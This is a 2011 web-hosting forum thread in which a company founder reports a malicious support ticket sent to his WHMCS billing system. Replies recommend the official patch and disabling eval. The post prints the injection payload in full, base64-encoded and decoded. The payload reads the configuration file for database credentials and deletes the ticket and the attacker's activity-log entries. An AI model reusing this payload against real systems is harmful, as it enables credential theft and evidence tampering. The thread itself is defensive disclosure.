Hackers Attacked Mxzon's Server

[_Hosting_]

Hi everyone,

I dnt know if its related to recent hack or what,

In Mxzon's billing system, we got a a ticket with subject:

Code: 

{php}eval(base64_decode('JHRleHQ9ZmlsZV9nZXRfY29udGVudHMoImNvbmZpZ3VyYXRpb24ucGhwIik7DQoNCg0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KDQpldmFsKCR0ZXh0KTsNCg0KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgb3IgZGllKCJDYW4ndCBvcGVuIGNvbm5lY3Rpb24gdG8gTXlTUUwiKTsNCm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW4ndCBzZWxlY3QgZGF0YKWWHhc2UiKTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIFdIRVJFIHRpdGxlIGxpa2UgMHgyNTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZSk7DQokZGVsZXRlMiA9IkRFTEVURSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9JyIuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCg=='));{/php}

Decoded:

Code: 

$text=file_get_contents("configuration.php");


$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);

eval($text);

$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog  WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);

I dnt know if it worked, but it didn't harmed our billing system...
I deleted the ticket, plz be alerted as i think boxslots and servedome are also heaving issues...

I think if we disable eval it can make this hack zero...
what you guys suggest??

Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)

_Hosting_ Reviewed by _Hosting_ on 6th Dec 2011. Hackers Attacked Mxzon's Server Hi everyone, I dnt know if its related to recent hack or what, In Mxzon's billing system, we got a a ticket with subject: Rating: 5

[XSLTel]

apply this WHMCS patch if you didn't yet

http://forum.whmcs.com/showthread.php?t=43462

Highest Regards
Mohammed H

[Krun!x]

Yes, it's the lastest exploit.

First go here and download official patch.
http://forum.whmcs.com/showthread.ph...522#post206522

Then you can follow my guide if you want to make your WHMcs a bit more secure.
http://www.besthostingforums.com/10-...tch-whmcs.html

You can also disable eval, WHMcs doesn't need it.

[_Hosting_]

I already did, is it related to this patch???

Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)

[Krun!x]

Yes, the latest patch will fix above exploit.

[c0rrupt]

I got the same support ticket submitted today from a France IP Address.

I already applied the WHMCS patch the day it was released.

[Shad0w]

I don't think the hack worked either, because the ticket would have been deleted if it did.